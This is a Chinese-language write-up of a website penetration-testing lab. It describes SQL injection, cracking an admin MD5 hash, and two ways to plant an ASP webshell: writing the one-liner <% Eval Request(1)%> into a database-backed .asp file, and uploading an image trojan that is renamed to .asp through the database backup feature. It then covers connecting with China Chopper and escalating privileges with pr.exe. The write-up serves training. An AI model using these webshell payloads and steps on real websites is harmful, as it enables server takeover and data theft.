網站綜合滲透實驗 writeup
感受 ,做這些實驗主要難點我感覺就是上傳webshell 了,他插入shell的姿勢讓我防不勝防,這裡插那裡插,上一個實驗還需要閉合引號,這個實驗不用閉合引號,上個實驗路徑比較簡單,這個實驗路徑比較複雜,尤其是 bear.asp的檔案是資料庫檔案 … 想了好久才想通,到底為什麼不用閉合引號 … 為什麼路徑是/db/bear.asp … 上傳sehll有兩種方法,都學習了是不吃虧的哦 ~
實驗過程 :
由上次實驗知道得到一個陌生的網站需要乾的事情,首先掃描後臺,然後利用網站的漏洞,找管理員賬號密碼
哪裡有注入點,如果不知道的話建議先學學Sql注入吧 … 少用工具去檢測是否存在漏洞 …
這裡密碼被加密,百度搜md5 線上解密,解密即可,獲取管理員賬號密碼後,掃描後臺
登陸進去後找上傳shell的地方,然後提權,進一步控制對方伺服器這裡有兩種方法
傳入shell方法一 直接寫入asp檔案
就是在這裡進行插入一句話,對於新手來說可能不太懂為什麼這樣插,因為那時我就很迷惑,然後捋清思路,這裡輸入的東西肯定是要儲存進資料庫,那麼資料庫在哪裡? 在備份資料庫哪裡可以看到資料庫名字是bear.asp ,然後直接寫 <% Eval Request(1)%> ,儲存
使用菜刀連線即可
傳入shell方法二 利用備份資料庫功能
點選 [設定管理] –> [系統變數設定],發現系統設定中有上傳圖片的地方,下一步,構造圖片木馬;
在桌面上新建一個文字檔案,在裡面寫入一句話木馬
<%Eval Request(“ichunqiu”)%>
後面隨便輸入一些內容,純粹是為了增加圖片體積,但要注意,幾十Kb足矣,體積太大太小都不行;
然後將檔案重新命名為jpg格式檔案,點選 [上傳圖片],把剛才構造的圖片傳上去,然後點選 [生成程式碼],這裡會給出圖片儲存的路徑,一會兒菜刀連線需要這個路徑
關鍵步驟到了!點選左側選單 [資料管理]–>[備份/恢復資料庫],把 [資料庫路徑] 修改為剛才複製的圖片路徑,[備份的資料庫路徑] 修改為字尾名為asp的檔案,檔名自己取,記住就行,然後點選備份;[ 特別注意:兩個路徑的最前面都有斜槓 ]
兩種方法都能將shell上傳成功,然後就是菜刀連線了
連線進去之後,上傳一個cmd.exe 執行命令,建立使用者提示許可權不夠,然後上傳pr.exe 這個是專門用來提權的
PS:
提權和獲取伺服器主機hash,這裡在上一個實驗的文章中已經有詳細介紹,不再繼續介紹
PS:
如果你留心,會發現第一題問的是論壇管理員的密碼是多少,這裡我在看別人文章時才注意到的,當我提交的是論壇管理員的密碼,最後得分總是87分,不能解鎖下一關實驗,然後我輸入網站管理員密碼,最後得分102 成功解鎖下一關實驗